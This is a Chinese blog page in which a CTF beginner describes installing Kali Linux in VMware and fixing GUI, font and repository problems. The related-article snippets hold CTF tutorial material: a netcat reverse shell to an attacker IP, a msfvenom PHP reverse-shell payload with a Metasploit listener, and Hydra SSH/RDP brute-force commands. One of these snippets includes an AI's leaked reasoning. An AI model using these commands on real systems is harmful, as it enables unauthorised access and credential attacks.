CTF小白的kali学习日记（1）

最新推荐文章于 2025-07-04 11:05:56 发布

原创

最新推荐文章于 2025-07-04 11:05:56 发布 · 1.2k 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#kali #kali linux

本文是CTF新手在VMware上安装kali Linux的学习日记，记录了安装过程中遇到的问题，如无图形界面、中文乱码及无法连接官方源。建议新手选择下载VM版本的kali，因其包含完整的英文原版系统，安装更顺畅。

CTF小白的kali学习日记（1）

kali虚拟机安装

VMware

kali

kali虚拟机安装

VMware

使用kali的第一步当然是要装kali虚拟机

~~不会真的有人把kali装在物理机上吧~~

这里我用的是VM ware，安装教程在这里，安装过程并不困难

镜像是一种文件格式，是为了后面使用虚拟光驱装系统准备的

kali

VM安装好以后就要找kali的镜像了，kali的镜像可以在官网找到

跟着教程安装了好几遍，系统每次都安装上去了，但是总会出现这样那样的问题

大概是这么几个方面的问题

1.没有图形界面。

2.下载时选择了中文版，中文乱码。

3.无法安装软件的时候无法连接kali的官方源，又换不回国内的源

大概原因我也分析出来了：

1.字体和图形界面大概率都是因为国外的源被墙了，下载速度过慢导致系统判断无法链接。没有图形界面的话，开启系统就进入命令行界面。

2.2020版本的kali取消了用户默认root权限，要更改sources.list文件一定要root权限，这是我后来发现的。

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

kofi6

关注关注

0
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【靶场搭建】kali搭建CTFd静态靶场

qq_39972370的博客

03-01

1764

CTFd 是一个 Capture The Flag 框架，专注于易用性和可定制性。它配备了运行 CTF 所需的一切，并且很容易使用插件和主题进行自定义。

网络渗透测试实验四

wow_iamfree的博客

12-07

752

文章目录一、实验目的二、实验准备与内容三、实验过程1.netdiscover发现WebDeveloper的ip2.nmap扫描目标开发端口3.访问目标网站4.whatweb探测CMS模板5.WPScan工具简介6.Dirb网站目录爆破7.通过爆出的路径找到cap文件8.利用WordPress插件漏洞找到目标配置文件9.远程连接目标10.使用tcpdump执行任意命令一、实验目的通过对目标靶机的渗透过程，了解CTF竞赛模式，理解CTF涵盖的知识范围，如MISC、PPC、WEB等，通过实践，加强团队协作能

参与评论您还未登录，请先登录后发表或查看评论

ctf实战第一节：kali环境的熟悉:最新ZSH，初始化root密码，环境配置

viviliving的专栏

10-01

2732

最近国家要求各个部分重视网络安全生产，但是小白还是比较多，我就开始自己的洗白之路 1、下载《Kali-Linux-2020.3-vmware-i386》最新版，自带ZSH 2、导入vmware15，之前版本报错，估计镜像是基于15做的 3、开机 4、默认只有kali用户密码kali 我想开root kali@kali:~/Desktop$ sudo su [sudo] password for kali: root@kali:/home/kali/Desktop# passwd New p.

kali对CTF靶场进行渗透测试找flag

勤能补拙

05-09

2914

kali Linux做攻击机渗透测试CTF靶场找flag

kail做CTF杂项题的工具安利一波！

qidiandexiaowu

04-08

6369

前言：上周的比赛，知识和工具都补充了一波，着实吓到我这老菜鸟了。 1.blind-watermark 这个工具主要是解决盲水印问题。克隆到kail里 python encode.py --image <image file> --watermark <watermark file> --result <result file> python decode.p...

我的 ctf kali 常用命令

csdn_ocheers的博客

06-25

2884

ctf kali 常用命令

CTF小白的kali学习日记（2）

kofi的博客，已停更

01-16

712

文章部分内容转载自https://www.bilibili.com/read/cv5453903 、https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=106451 kali实装版本：2020.4(VM版）VM实装版本:16.0.1 上一篇讲了我怎么安装kali虚拟机，现在来讲下我怎么配置系统的更换镜像源此步骤需要root权限，如果不知道目前账户是否有root权限，请先看下一步在kali系统中自带了许多渗透工具，这些工具都可

CTF渗透训练环境（镜像，视频，虚拟机）

12-26

带靶机镜像，教学视频（SSH私钥泄露、SSH渗透root主机、SMB服务信息泄露、FTP服务后门利用、Sql-GET参数注入、Sql-POST参数...kali虚拟机（2022.4），虚拟机环境（Vmware、VirtualBox），下载环境来进行一次CTF渗透测试

kali网络渗透实验四：CTF实践

FFFde博客

12-25

2375

实验四 CTF实践实验目的系统环境实验工具实验内容实验步骤：1、发现目标 (netdiscover)，找到WebDeveloper的IP地址2、利用NMAP扫描目标主机，发现目标主机端口开放、服务情况，说明目标提供的服务有哪些？3、若目标主机提供了HTTP服务，尝试利用浏览器访问目标网站4、利用whatweb探测目标网站使用的CMS模板5、网络搜索wpscan，简要说明其功能6、使用 Dirb 爆破网站目录，6、找到一个似乎和网络流量有关的目录（路径）7、利用Wireshark分析该数据包，分析TCP数据流

用于CTF（MISC）的kali虚拟机更改过程记录

Che_ng的博客

10-18

2596

用于CTF（MISC）的虚拟机

Kali Linux CTF Blueprints.pdf

08-24

讲Kali的，主要说CTF中的应用。打比赛的同学关注一下。

【CTF-Web环境搭建】kali

最新发布

weixin_67876387的博客

07-04

403

这里在官网上下载下kali虚拟机网速比较慢的话打开一下加速器下载完成后得到一个压缩包选择一个合适的地方将这个压缩包解压一下记住这个文件目录这里为了后续方便简历一个叫做Virtual Machines的文件夹里面就可以放不同的虚拟机了下面点击打开虚拟机找到刚刚我们的目录选择这个文件点击确定就加载好了。

Metosploit官方说明

qq_43776408的博客

08-31

558

Core Commands ============= Command Description ------- ----------- ? Help menu banner Display an awesome metasploit banner cd Change the...

当黑客就入门可能是最全面的Kali子系统安装教程——打造你最趁手的CTF利器

Tuye的博客

08-09

2835

编辑中

CTF零基础入门教程

m0_71322636的博客

01-02

1900

CTF 是一种网络安全领域的竞赛形式，通过设置各种类型的题目，涵盖了从网络攻防、密码学、逆向工程、漏洞挖掘到 Web 安全等多个方面，参赛选手以团队或个人形式参与，目标是获取题目中的 “Flag”（通常是一串特定格式的字符串），并提交以获取相应分数，最终根据得分情况来评判胜负。在 3 - 6 个月的时间内，初步掌握 CTF 比赛涉及的主要知识领域基础内容，能够独立完成一些简单的 CTF 题目，并对常见的解题思路和方法有清晰的认知。

CTF题库-实验吧（web）之Kali系统的下载与安装

qq_37992321的博客

12-03

3342

1.Kali系统的下载：官网下载：https://www.kali.org/ 点击Download 选择适合自己的系统版本，一般CTF比赛的话我们选择32位的，因为它里面的工具齐全 2.VM虚拟机的下载官网下载：https://www.vmware.com/cn.html 虚拟机的下载就不多说了，大家都会下载 3.虚拟机的安装（1）双击下载好的文件（2）点击“下一步” （3）选择...

ctf的linux基础知识总结,初来乍到及分享CTF、Linux学习路线

weixin_29767773的博客

05-13

890

初来乍到的网络安全大二vegetable chicken其实很久之前就接触博客园了，自己的代码一跑起来错误、或者在学渗透做CTF有困难的时候也都是来博客园寻求解答，看着别人用CSS和HTML打造着属于他们自己的网页，分享着他们的知识和经历，真的是既羡慕又崇拜。于是昨晚申请了属于自己的网页，希望能在维护自己的网页的过程中把CSS和HTML运用得更好，后续可能会加上js让自己的网页变得更好。也想通过写...

ctf之kali linux一些工具的使用

m0_74475929的博客

08-20

3754

Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 ssh ----ssh协议爆破。Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 rdp----远程桌面爆破。2.base -d -i <file>--------- base64解密 -i去除无用字符。exiftool <file> ---------查看exif类型文件详细信息。

CTF实践（实验四）

weixin_51458001的博客

12-06

742

什么是CTF CTF（Capture The Flag）中文一般译作夺旗赛，在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会，以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今，已经成为全球范围网络安全圈流行的竞赛形式，2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地，DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛，类似于CTF赛场中的“世界杯”。 CTF竞赛模式（1

ctf中kali监听主机

03-26

<think>好的，我现在需要帮用户了解如何在CTF场景下使用Kali进行主机监听。首先，用户提到了Kali的网络配置和nmap扫描，引用[1]中提到了nmap -sP来发现靶机，这可能涉及到主机发现的基础步骤。用户需要的是具体的监听教程，所以应该从网络配置、工具使用、实战步骤等方面展开。首先，要确保Kali的网络设置正确。CTF中常用的是NAT模式或者桥接，这会影响监听的IP地址选择。然后，用户可能需要使用工具如tcpdump或Wireshark进行流量捕获，引用[4]提到tcpdump可以执行任意命令，但这里用户需要的是监听，所以应重点介绍如何用tcpdump捕获数据包。接下来，主机发现是关键步骤，nmap的扫描命令需要详细说明，比如-sP用于Ping扫描，之后可能需要更详细的端口扫描，如-sS。同时，Metasploit的模块可能用于漏洞利用后的监听，比如设置反向shell的监听端，引用[3]中的wget下载reverse.txt可能涉及payload的生成和监听，所以这里需要解释如何用nc或msfvenom生成payload并启动监听。另外，引用[2]提到直接与互联网互通，可能涉及端口转发或内网穿透，但在CTF中可能更多是本地监听，比如使用nc监听特定端口等待反向连接。需要分步骤说明，比如使用nc -lvp 4444，以及如何结合漏洞利用触发连接。还要注意权限问题，引用[4]提到以root权限执行tcpdump，可能某些监听工具需要提升权限，所以在教程中要提醒用户必要时使用sudo。此外，实战案例需要结合具体的例子，比如在获取webshell后，如何通过命令让靶机连接到监听端口，引用[3]中的例子可能涉及下载reverse shell脚本并执行，从而触发监听端的连接。最后，生成相关问题需要考虑用户可能的后续疑问，比如监听没反应怎么办，如何过滤数据包，或者如何自动化监听过程。需要覆盖工具使用、排错、优化等方面的问题。</think>### Kali在CTF场景下的主机监听教程 #### 一、网络配置与工具准备 1. **网络模式选择** 确保Kali处于与目标相同的网络环境（如NAT或桥接模式），通过`ifconfig`或`ip a`查看本机IP，例如发现网段为`192.168.0.0/24`时，可快速定位靶机[^1]。 2. **基础工具安装** Kali默认集成以下工具： - `nmap`：用于主机发现与端口扫描 - `tcpdump`：命令行抓包工具 - `Wireshark`：图形化流量分析工具 - `netcat (nc)`：网络调试与监听工具 --- #### 二、主机发现与端口扫描 1. **快速发现存活主机** 使用`nmap`进行Ping扫描： ```bash nmap -sP 192.168.0.0/24 ``` 输出示例： ``` Nmap scan report for 192.168.0.105 Host is up (0.00020s latency) ``` 2. **详细端口扫描** 对目标IP进行SYN隐形扫描： ```bash nmap -sS 192.168.0.105 -p 1-1000 ``` --- #### 三、流量监听实战方法 1. **tcpdump基础监听** 监听指定网卡的流量（需root权限）： ```bash sudo tcpdump -i eth0 -vnn host 192.168.0.105 ``` 关键参数说明： - `-i`：指定网卡 - `host`：过滤特定IP - `port`：过滤端口（如`port 80`） 2. **netcat建立监听端口** 监听本地4444端口等待反向连接： ```bash nc -lvp 4444 ``` 若靶机通过漏洞触发连接（如执行`nc 192.168.0.100 4444 -e /bin/sh`），即可获得shell[^4]。 --- #### 四、Metasploit高级监听 1. **生成反向shell载荷** 使用`msfvenom`生成PHP反向shell： ```bash msfvenom -p php/reverse_php LHOST=192.168.0.100 LPORT=4444 -f raw > shell.php ``` 2. **启动监听模块** ```bash msfconsole use exploit/multi/handler set PAYLOAD php/reverse_php set LHOST 192.168.0.100 set LPORT 4444 exploit ``` --- #### 五、实战案例：CTF中的Web渗透监听 1. **场景复现** 假设通过Web漏洞上传了webshell（如`shell.php?cmd=id`），可触发靶机连接监听端： ```bash wget http://攻击机IP/shell.php -O /tmp/s.php # 引用[3]类似手法 ``` 2. **监听结果捕获** 在Kali中观察到TCP握手包即表示连接成功，后续可进行交互式操作。 ---